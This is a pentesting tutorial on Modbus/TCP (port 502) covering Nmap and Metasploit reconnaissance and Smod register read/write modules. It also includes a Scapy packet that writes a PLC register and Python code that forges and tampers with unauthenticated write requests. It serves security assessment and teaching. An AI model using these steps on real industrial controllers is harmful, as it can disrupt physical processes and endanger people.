Modbus - Port 502
Modbus is a communication protocol used in industrial automation to allow devices like programmable logic controllers (PLCs) to talk to each other.
Basic info
Modbus runs as a master/slave protocol (current spec wording: client/server): one master polls and writes to one or more slave devices, each addressed by a unit ID. Modbus TCP carries the same PDUs over TCP port 502 (Modbus RTU and ASCII run over serial links), and the base protocol defines no authentication, authorization or encryption, so anything that can reach 502/tcp can usually read and write process values directly. That makes port 502 a primary target when assessing an industrial network.
Workflow
Scan for Devices: Use Nmap to find hosts listening on TCP port 502.
Fingerprint the System: Use tools like Metasploit's modbusdetect module to confirm the service is really Modbus and learn which unit IDs respond.
Check Security Features: Test whether the device requires any authentication. Plain Modbus TCP has none, so anyone who can reach the port can issue commands; only a TLS wrapper (Modbus/TCP Security on port 802) or network controls in front of the PLC change that.
Test Function Codes: Enumerate the function codes the device accepts (e.g. 0x01 Read Coils, 0x03 Read Holding Registers, 0x06 Write Single Register, 0x10 Write Multiple Registers) to see which process data can be read and, more importantly, written.
Look for Exploits: Probe the implementation with malformed or oversized frames (an MBAP length field that disagrees with the payload, out-of-range counts) for crashes such as buffer overflows, and test man-in-the-middle attacks, since Modbus traffic is unencrypted and carries no integrity check. Do this only against lab or explicitly in-scope devices: PLCs frequently fault on malformed input.
Unexpected Detail: Lack of Encryption
Modbus TCP sends requests and responses in cleartext with no authentication or integrity protection, so an attacker on the path can read every process value and silently change a write before it reaches the PLC. The Modbus Organization's Modbus/TCP Security specification adds TLS on port 802, but it is rarely deployed, so in practice the risk in industrial settings is mitigated (if at all) by network segmentation rather than by the protocol itself.
Scanning for Devices
Start by using Nmap to scan for Modbus devices on port 502. Run this command:
nmap -p 502 --script modbus-discover <IP_RANGE>
The modbus-discover script probes unit IDs and prints any device identification string the slave returns. By default it stops at the first unit ID that answers; add --script-args modbus-discover.aggressive=true to walk the whole unit ID range. A closed port 502 does not rule out Modbus, since some devices are configured on alternate ports, so follow up with a full port scan when the host is in scope.
Initial Reconnaissance
Use Metasploit for deeper reconnaissance. First, detect the Modbus service:
msf > use auxiliary/scanner/scada/modbusdetect
msf auxiliary(modbusdetect) > set RHOSTS <IP_ADDRESS>
msf auxiliary(modbusdetect) > run
Then, enumerate unit IDs (this module brute-forces the unit ID field of the MBAP header, so you learn which addresses the device actually answers on before reading or writing anything):
msf > use auxiliary/scanner/scada/modbus_findunitid
msf auxiliary(modbus_findunitid) > set RHOSTS <IP_ADDRESS>
msf auxiliary(modbus_findunitid) > run
Interacting with Devices
Install and use Smod (a Metasploit-style Modbus framework; it is Python 2 code that depends on Scapy) for detailed interaction. Clone and run it:
git clone https://github.com/enddo/smod
cd smod
python2 smod.py
Smod has no separate connect step: each module takes the target as an option. First enumerate the function codes the device accepts:
smod > use modbus/scanner/getfunc
smod modbus(getfunc) > set RHOSTS <IP_ADDRESS>
smod modbus(getfunc) > exploit
Then read holding registers, setting the unit ID, start address and count that show options lists for the module; the matching modbus/function/writeSingleRegister module writes one (writes change the process state, so use it only on a device you are authorized to manipulate):
smod > use modbus/function/readHoldingRegister
smod modbus(readHoldingRegister) > show options
smod modbus(readHoldingRegister) > set RHOSTS <IP_ADDRESS>
smod modbus(readHoldingRegister) > exploit
Exploiting Vulnerabilities
Probe for memory-safety bugs by sending oversized or malformed frames (Smod includes a fuzzing module for this) and watching whether the device stops responding; a PLC that faults on a bad MBAP length is a denial-of-service finding even when no overflow turns out to be exploitable. For man-in-the-middle attacks, first capture traffic with Wireshark, which dissects Modbus natively (display filter: modbus):
wireshark -i <INTERFACE> -f "tcp port 502"
Then use Scapy to craft and send a modified request. A forged segment is only accepted inside an established TCP session, so in practice you either inject from an on-path position (for example after ARP spoofing) with the correct sequence numbers, or simply open your own TCP connection to port 502, which the unauthenticated device accepts just the same. The frame below is a Write Single Register request (MBAP header followed by the PDU):
from scapy.all import Ether, IP, TCP, Raw, sendp
# MBAP: transaction id 1, protocol 0, length 6, unit id 1
mbap = b"\x00\x01\x00\x00\x00\x06\x01"
# PDU: function 0x06 (Write Single Register), register 0, value 100
pdu = b"\x06\x00\x00\x00\x64"
modbus_packet = Ether() / IP(dst="<TARGET_IP>") / TCP(dport=502) / Raw(load=mbap + pdu)
sendp(modbus_packet)
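To make the function-code testing, the register read/write interaction and the man-in-the-middle tampering above concrete, here is a pure-Python (stdlib only) Modbus/TCP framer and parser. It is an added example for this page, not code from the article, smod or Metasploit; the host address in the comment is hypothetical and the three "captured" frames are constructed to stand in for a Wireshark capture. It builds MBAP headers and PDUs for 0x01, 0x03 and 0x06, decodes responses including exception responses (function code with 0x80 set), and shows that rewriting the value inside a captured write request needs nothing more than a slice, because the frame carries no MAC or signature.

```python
"""Minimal Modbus/TCP framing (stdlib only). Added example for this page,
not code from the VeryLazyTech article, smod or Metasploit. Host names,
unit IDs and the "captured" frames below are constructed for illustration.
"""
import socket
import struct

MODBUS_PORT = 502
PROTOCOL_ID = 0            # always 0 for Modbus/TCP
READ_COILS = 0x01
READ_HOLDING_REGISTERS = 0x03
WRITE_SINGLE_REGISTER = 0x06
EXCEPTION_NAMES = {1: "Illegal Function", 2: "Illegal Data Address",
                   3: "Illegal Data Value", 4: "Slave Device Failure"}


def build_frame(tid, unit_id, function_code, data=b""):
    """MBAP header (7 bytes) + PDU; the length field counts unit id + PDU."""
    pdu = struct.pack("!B", function_code) + data
    return struct.pack("!HHHB", tid, PROTOCOL_ID, len(pdu) + 1, unit_id) + pdu


def read_coils(tid, unit_id, start, count):
    return build_frame(tid, unit_id, READ_COILS, struct.pack("!HH", start, count))


def read_holding_registers(tid, unit_id, start, count):
    return build_frame(tid, unit_id, READ_HOLDING_REGISTERS, struct.pack("!HH", start, count))


def write_single_register(tid, unit_id, addr, value):
    return build_frame(tid, unit_id, WRITE_SINGLE_REGISTER, struct.pack("!HH", addr, value))


def parse_frame(frame):
    """Split MBAP + PDU and flag exception responses (function code | 0x80)."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header + function code")
    tid, proto, length, unit_id = struct.unpack("!HHHB", frame[:7])
    if proto != PROTOCOL_ID:
        raise ValueError("protocol id %d is not Modbus/TCP" % proto)
    if length != len(frame) - 6:
        raise ValueError("MBAP length %d != %d bytes present" % (length, len(frame) - 6))
    function, data = frame[7], frame[8:]
    parsed = {"tid": tid, "unit_id": unit_id, "function": function & 0x7F,
              "exception": None, "data": data}
    if function & 0x80:
        code = data[0] if data else None
        parsed["exception"] = (code, EXCEPTION_NAMES.get(code, "Unknown"))
    return parsed


def registers_from_response(frame):
    """Decode a Read Holding Registers (0x03) response into a list of ints."""
    p = parse_frame(frame)
    if p["exception"]:
        raise RuntimeError("device returned exception %r" % (p["exception"],))
    if p["function"] != READ_HOLDING_REGISTERS:
        raise ValueError("unexpected function code 0x%02x" % p["function"])
    byte_count = p["data"][0]
    return list(struct.unpack("!%dH" % (byte_count // 2), p["data"][1:1 + byte_count]))


def tamper_write_value(frame, new_value):
    """On-path tampering: rewrite the value in a captured 0x06 request.

    The frame carries no MAC, signature or nonce, so the PLC cannot tell the
    value changed in transit; only TLS (Modbus/TCP Security, port 802) or
    strict network segmentation prevents this.
    """
    if parse_frame(frame)["function"] != WRITE_SINGLE_REGISTER:
        raise ValueError("not a Write Single Register request")
    return frame[:10] + struct.pack("!H", new_value)   # keep MBAP(7)+fc(1)+addr(2)


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-frame")
        buf += chunk
    return buf


def query(host, frame, port=MODBUS_PORT, timeout=3.0):
    """Send one request over a real TCP session and return the raw reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(frame)
        head = _recv_exact(s, 6)                        # tid, proto, length
        return head + _recv_exact(s, struct.unpack("!H", head[4:6])[0])


# Constructed frames standing in for a Wireshark capture (not real traffic):
CAPTURED_WRITE_REQUEST = bytes.fromhex("000100000006010600000064")    # unit 1: reg 0 := 100
CAPTURED_READ_RESPONSE = bytes.fromhex("000200000007010304006401f4")  # regs 0..1 = 100, 500
CAPTURED_EXCEPTION = bytes.fromhex("000300000003018302")              # 0x03 -> Illegal Data Address

if __name__ == "__main__":
    print("request  :", read_holding_registers(1, 1, 0, 2).hex())
    print("registers:", registers_from_response(CAPTURED_READ_RESPONSE))
    print("exception:", parse_frame(CAPTURED_EXCEPTION)["exception"])
    print("tampered :", tamper_write_value(CAPTURED_WRITE_REQUEST, 0xFFFF).hex())
    # Against an in-scope lab PLC (hypothetical address):
    # print(query("192.0.2.10", read_coils(1, 1, 0, 8)).hex())
```

The parser rejects frames whose MBAP length field disagrees with the bytes present, which is exactly the malformed case the fuzzing step above sends to a device; a PLC that lacks such a check is where the oversized-request crashes come from. `query()` uses an ordinary TCP socket, which is all an attacker needs against an unauthenticated slave, and is the simpler alternative to injecting raw segments with Scapy.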